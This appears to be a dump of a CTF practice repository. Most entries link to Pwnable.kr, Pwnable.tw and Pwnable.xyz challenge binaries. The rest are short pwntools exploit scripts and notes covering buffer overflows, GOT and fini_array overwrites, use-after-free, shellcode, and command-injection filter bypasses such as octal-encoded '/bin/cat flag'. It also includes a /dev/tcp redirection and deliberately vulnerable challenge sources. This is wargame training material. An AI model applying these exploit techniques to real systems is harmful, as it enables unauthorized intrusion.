https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/md5_calculator/md5_calculator -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/note/note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/note/note -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/otp/exp: -------------------------------------------------------------------------------- 1 | ###if write to file fails, the file will be empty 2 | ###ulimit can set limit to maximum write size to file 3 | ###WARNING : directly executing ./otp 0 will trigger SIGXFSZ 4 | ### but running it as subprocess will bypass this problem 5 | 6 | ulimit -f 0 && python -c "import os; os.system('./otp 0')" 7 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/rsa_calculator/rsa_calculator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/rsa_calculator/rsa_calculator -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/simple_login/exp.py: -------------------------------------------------------------------------------- 1 | ###stack migration 2 | 3 | from pwn import * 4 | 5 | ###Addr 6 | buf = 0x811eb40 7 | target = 0x8049284 8 | 9 | ###Exploit 10 | r = remote('pwnable.kr',9003) 11 | payload = p32(target)+b'a'*4+p32(buf-4) 12 | payload = b64e(payload) 13 | r.sendlineafter('Authenticate : ',payload) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/simple_login/simple_login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/simple_login/simple_login -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Rookie/tiny_easy/tiny_easy: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Rookie/tiny_easy/tiny_easy -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Exploitable/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | # libc2.23 5 | stdout_struct_offset = 0x1b2d60 6 | one_gadget = 0x3ac5c 7 | 8 | ###Exploit 9 | s = ssh(host='pwnable.kr', port=2222, 10 | user='exploitable', 11 | password='guest') 12 | r = s.process(['nc','127.0.0.1','9018']) 13 | 14 | stdout_struct_addr = u32(r.recv(4)) 15 | libc_base = stdout_struct_addr-stdout_struct_offset 16 | r.sendline(str(-(0xffffffff+1-(libc_base+one_gadget)))) 17 | r.interactive() 18 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Exploitable/exploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Secret/Exploitable/exploitable -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Malware/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r = remote('pwnable.kr',9017) 5 | 6 | ''' 7 | mov al, 0xC3 8 | mov rdi, [Rsp+0x78] 9 | stosb 10 | call [rsp+0x78] 11 | jmp 2 12 | add [rax], al 13 | ''' 14 | r.sendlineafter('A: ','.octa 0x2eb782454ffaa78247c8b48c3b0') 15 | ''' 16 | nop 17 | nop 18 | ... 19 | nop 20 | ''' 21 | r.sendlineafter('B: ','.rept 0x1000; .long 0x90909090; .endr') 22 | r.interactive() 23 | 24 | #R3l4tiVe_t1Ming_4ttAck_w1Th_Tr4nsLatiOn_caCh3_iS_FuN 25 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Secret/Unexploitable/unexploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Secret/Unexploitable/unexploitable -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/blackjack/exp: -------------------------------------------------------------------------------- 1 | no checking for negative bet 2 | just bet a large negative ammount of money and lose 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/blukat: -------------------------------------------------------------------------------- 1 | ###group permission set for password, just cat to read it 2 | ###by the way, the password is "cat: password: Permission denied", bruh 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/bof/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/bof/bof -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/bof/exp.py: -------------------------------------------------------------------------------- 1 | ###Simple bof to overwrite value 2 | 3 | from pwn import * 4 | 5 | r = remote('pwnable.kr',9000) 6 | payload = b'a'*0x34+p32(0xcafebabe) 7 | r.sendline(payload) 8 | r.interactive() 9 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/cmd1/cmd1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int filter(char* cmd){ 5 | int r=0; 6 | r += strstr(cmd, "flag")!=0; 7 | r += strstr(cmd, "sh")!=0; 8 | r += strstr(cmd, "tmp")!=0; 9 | return r; 10 | } 11 | int main(int argc, char* argv[], char** envp){ 12 | putenv("PATH=/thankyouverymuch"); 13 | if(filter(argv[1])) return 0; 14 | system( argv[1] ); 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/cmd1/exp: -------------------------------------------------------------------------------- 1 | ###Absolute path and wildcards are useful 2 | 3 | ./cmd1 "/bin/cat f???" 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/cmd2/exp: -------------------------------------------------------------------------------- 1 | passwd : mommy now I get what PATH environment is for :) 2 | 3 | ###Sol1 4 | cd / ### $pwd = / 5 | ./home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)f???' 6 | 7 | ###Sol2 8 | ###Encode command(/bin/cat flag) as octal and print it 9 | ./cmd2 '$(printf "\57\142\151\156\57\143\141\164\40\146\154\141\147")' 10 | 11 | ###Sol3 12 | ###command -p supplies a default path 13 | ./cmd2 'command -p cat f???' 14 | 15 | ###Sol4 16 | ###string indexing for desired characters(?) 17 | ###should be doable, but haven't tried 18 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/collision/exp: -------------------------------------------------------------------------------- 1 | ###learn how to pass binary as commandline argument 2 | 3 | ./col $(printf "\xec\x21\xdd\x21@:@@@:@@@:@@@9??") 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/fd/exp: -------------------------------------------------------------------------------- 1 | ###fd0 = stdin 2 | 3 | ./fd 4660 4 | LETMEWIN 5 | 6 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/flag/exp: -------------------------------------------------------------------------------- 1 | upx -d to unpack flag 2 | open with IDA to see flag 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/flag/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/flag/flag -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/horcruxes/horcruxes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/horcruxes/horcruxes -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/lotto/exp: -------------------------------------------------------------------------------- 1 | ###misconfiguration causes a "match" to happend on matching any single char 2 | ###input the same char six times, and success rate will be high enough 3 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/memcpy/exp: -------------------------------------------------------------------------------- 1 | ###the movntps command in fast_copy requires memory to be aligned by 16 bytes 2 | ###malloc chunks size in 32 bit will be padded to the nearest number where (N>(requested+4) && N%8==0) 3 | ###setting all requested size to be odd times of 8 will automatically meet requirement 4 | > 8 5 | > 24 6 | > 40 7 | > 72 8 | > 136 9 | > 264 10 | > 520 11 | > 1032 12 | > 2056 13 | > 4104 14 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/mistake/exp: -------------------------------------------------------------------------------- 1 | ### comparison operator comes before assign operator 2 | ### fd becomes 0 by mistake > reads from stdin 3 | 4 | 1111111111 5 | 0000000000 6 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/passcode/exp: -------------------------------------------------------------------------------- 1 | ###Hijack .got of exit 2 | 3 | python -c "print('a'*96+chr(0x18)+chr(0xa0)+chr(0x04)+chr(0x08)+str(0x80485e3))" | ./passcode 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/passcode/passcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/passcode/passcode -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/random/exp: -------------------------------------------------------------------------------- 1 | ###No random seed indicates fixed random seed 2 | 3 | -1255736440 4 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/random/random.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | unsigned int random; 5 | random = rand(); // random value! 6 | 7 | unsigned int key=0; 8 | scanf("%d", &key); 9 | 10 | if( (key ^ random) == 0xdeadbeef ){ 11 | printf("Good!\n"); 12 | system("/bin/cat flag"); 13 | return 0; 14 | } 15 | 16 | printf("Wrong, maybe you should try 2^32 cases.\n"); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/shellshock/shellshock.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main(){ 3 | setresuid(getegid(), getegid(), getegid()); 4 | setresgid(getegid(), getegid(), getegid()); 5 | system("/home/shellshock/bash -c 'echo shock_me'"); 6 | return 0; 7 | } 8 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/uaf/exp: -------------------------------------------------------------------------------- 1 | ###Use after Free 2 | ###Try to let function fake virtual ptr point to give_shell() 3 | ###pie is off, so we can easily find give_shell() at 0x401568 4 | ###Man object size = 24 5 | ./uaf 24 /tmp/fake 6 | > 3 7 | > 2 8 | > 1 9 | -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/uaf/uaf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/uaf/uaf -------------------------------------------------------------------------------- /Practice/Pwnable.kr/Toddler/unlink/unlink: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.kr/Toddler/unlink/unlink -------------------------------------------------------------------------------- /Practice/Pwnable.tw/3x17/3x17: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/3x17/3x17 -------------------------------------------------------------------------------- /Practice/Pwnable.tw/alive_note/alive_note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/alive_note/alive_note -------------------------------------------------------------------------------- /Practice/Pwnable.tw/applestore/applestore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/applestore/applestore -------------------------------------------------------------------------------- /Practice/Pwnable.tw/babyallocator/babyallocator: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/babyallocator/babyallocator -------------------------------------------------------------------------------- /Practice/Pwnable.tw/babystack/babystack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/babystack/babystack -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bash/bash/exp.py: -------------------------------------------------------------------------------- 1 | ###Abuse loader to run ELF without x permission 2 | 3 | from pwn import * 4 | 5 | r = remote('chall.pwnable.tw',10108) 6 | 7 | r.sendlineafter('bash-4.3$ ','/lib64/ld-linux-x86-64.so.2 /bin/bash') 8 | r.sendline('cat < /dev/tcp/127.0.0.1/1337') 9 | r.interactive() 10 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bash/prob/bash_revenge.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bash/prob/bash_revenge.tgz -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bookwriter/bookwriter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bookwriter/bookwriter -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_alpha/bounty_program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_alpha/bounty_program -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_alpha/wrapper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_alpha/wrapper -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_beta/bounty_program: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_beta/bounty_program -------------------------------------------------------------------------------- /Practice/Pwnable.tw/bounty_program_beta/wrapper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/bounty_program_beta/wrapper -------------------------------------------------------------------------------- /Practice/Pwnable.tw/breakout/breakout: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/breakout/breakout -------------------------------------------------------------------------------- /Practice/Pwnable.tw/calc/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/calc/calc -------------------------------------------------------------------------------- /Practice/Pwnable.tw/caov/caov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/caov/caov -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | MAINTAINER angelboy 3 | RUN apt-get update 4 | RUN apt-get install xinetd -y 5 | RUN apt-get install libc6-dev-i386 -y 6 | RUN useradd -m critical_heap++ 7 | RUN chmod 774 /tmp 8 | RUN chmod -R 774 /var/tmp 9 | RUN chmod -R 774 /dev 10 | RUN chmod -R 774 /run 11 | RUN chmod 1733 /tmp /var/tmp /dev/shm 12 | RUN chown -R root:root /home/critical_heap++ 13 | CMD ["/usr/sbin/xinetd","-dontfork"] 14 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/share/critical_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/critical_heap/prob/critical_heap/share/critical_heap -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | exec 2>/dev/null 4 | timeout 60 /home/critical_heap++/critical_heap 5 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/critical_heap/prob/critical_heap/xinetd: -------------------------------------------------------------------------------- 1 | service critical_heap 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/critical_heap++/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = critical_heap++ 10 | port = 4869 11 | flags = REUSE 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | } 16 | -------------------------------------------------------------------------------- /Practice/Pwnable.tw/deaslr/deaslr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/deaslr/deaslr -------------------------------------------------------------------------------- /Practice/Pwnable.tw/death_note/death_note: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/death_note/death_note -------------------------------------------------------------------------------- /Practice/Pwnable.tw/digimon/digimon: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/digimon/digimon -------------------------------------------------------------------------------- /Practice/Pwnable.tw/dubblesort/dubblesort: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/dubblesort/dubblesort -------------------------------------------------------------------------------- /Practice/Pwnable.tw/food_store/food_store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/food_store/food_store -------------------------------------------------------------------------------- /Practice/Pwnable.tw/ghostparty/ghostparty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/ghostparty/ghostparty -------------------------------------------------------------------------------- /Practice/Pwnable.tw/hacknote/hacknote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/hacknote/hacknote -------------------------------------------------------------------------------- /Practice/Pwnable.tw/heap_paradise/heap_paradise: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/heap_paradise/heap_paradise -------------------------------------------------------------------------------- /Practice/Pwnable.tw/kidding/kidding: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/kidding/kidding -------------------------------------------------------------------------------- /Practice/Pwnable.tw/mno2/mno2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/mno2/mno2 -------------------------------------------------------------------------------- /Practice/Pwnable.tw/omegago/omegago: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/omegago/omegago -------------------------------------------------------------------------------- /Practice/Pwnable.tw/orw/orw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/orw/orw -------------------------------------------------------------------------------- /Practice/Pwnable.tw/printable/printable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/printable/printable -------------------------------------------------------------------------------- /Practice/Pwnable.tw/re-alloc/re-alloc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/re-alloc/re-alloc -------------------------------------------------------------------------------- /Practice/Pwnable.tw/re-alloc_revenge/re-alloc_revenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/re-alloc_revenge/re-alloc_revenge -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/allow_orw.bpf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seccomp_tools/allow_orw.bpf -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/forbid_execve.bpf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seccomp_tools/forbid_execve.bpf -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/kill_all.bpf: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seccomp_tools/seccomp-tools: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seccomp_tools/seccomp-tools -------------------------------------------------------------------------------- /Practice/Pwnable.tw/secret_of_my_heart/secret_of_my_heart: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/secret_of_my_heart/secret_of_my_heart -------------------------------------------------------------------------------- /Practice/Pwnable.tw/secretgarden/secretgarden: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/secretgarden/secretgarden -------------------------------------------------------------------------------- /Practice/Pwnable.tw/seethefile/seethefile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/seethefile/seethefile -------------------------------------------------------------------------------- /Practice/Pwnable.tw/silver_bullet/silver_bullet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/silver_bullet/silver_bullet -------------------------------------------------------------------------------- /Practice/Pwnable.tw/spirited_away/spirited_away: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/spirited_away/spirited_away -------------------------------------------------------------------------------- /Practice/Pwnable.tw/starbound/starbound: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/starbound/starbound -------------------------------------------------------------------------------- /Practice/Pwnable.tw/start/start: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/start/start -------------------------------------------------------------------------------- /Practice/Pwnable.tw/stupid_boss/stupid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/stupid_boss/stupid -------------------------------------------------------------------------------- /Practice/Pwnable.tw/tcache_tear/tcache_tear: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/tcache_tear/tcache_tear -------------------------------------------------------------------------------- /Practice/Pwnable.tw/unexploitable/unexploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/unexploitable/unexploitable -------------------------------------------------------------------------------- /Practice/Pwnable.tw/wannaheap/wannaheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.tw/wannaheap/wannaheap -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Add/add: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Add/add -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Add/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | 5 | ###Addr 6 | win = 0x400822 7 | 8 | ###Exploit 9 | r = remote('svc.pwnable.xyz',30002) 10 | 11 | r.sendlineafter('Input: ',str(win)+' '+str(0)+' '+str(13)) 12 | r.sendlineafter('Input: ','M30W') 13 | 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/AdultVM/kernel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/AdultVM/kernel -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/AdultVM/userland: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/AdultVM/userland -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Attack/attack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Attack/attack -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/BabyVM/babyvm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/BabyVM/babyvm -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Badayum/badayum: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Badayum/badayum -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Bookmark/bookmark: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Bookmark/bookmark -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Bookmark/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Util 4 | def create(protocol,size,data): 5 | r.sendlineafter('> ','2') 6 | r.sendafter('insecure: ',protocol) 7 | r.sendafter('url: ',str(size).ljust(0x20,'a')) 8 | r.send(data) 9 | 10 | def get_flag(): 11 | r.sendlineafter('> ','4') 12 | 13 | ###Exploit 14 | r = remote('svc.pwnable.xyz',30021) 15 | ###BOF with logic error into login check buf 16 | for i in range(3): 17 | create('https',0x7f,':'*0x7f) 18 | ###Get flag 19 | get_flag() 20 | r.interactive() 21 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Car_shop/car_shop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Car_shop/car_shop -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Catalog/catalog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Catalog/catalog -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Child/child: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Child/child -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Dirty_Turtle/dirty_turtle: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Dirty_Turtle/dirty_turtle -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Dirty_Turtle/exp.py: -------------------------------------------------------------------------------- 1 | ###no-relro -> fini_array is writeable 2 | 3 | from pwn import * 4 | 5 | ###Addr 6 | fini_array = 0x600bc0 7 | win = 0x400821 8 | 9 | ###Exploit 10 | r = remote('svc.pwnable.xyz',30033) 11 | r.sendlineafter('Addr: ',str(fini_array)) 12 | r.sendlineafter('Value: ',str(win)) 13 | r.interactive() 14 | -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Door/door: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Door/door -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Executioner/executioner: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Executioner/executioner -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/ExecutionerV2/executionerv2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/ExecutionerV2/executionerv2 -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Fclose/fclose: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Fclose/fclose -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Fishing/fishing: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/Practice/Pwnable.xyz/Fishing/fishing -------------------------------------------------------------------------------- /Practice/Pwnable.xyz/Free_spirit/free_spirit: 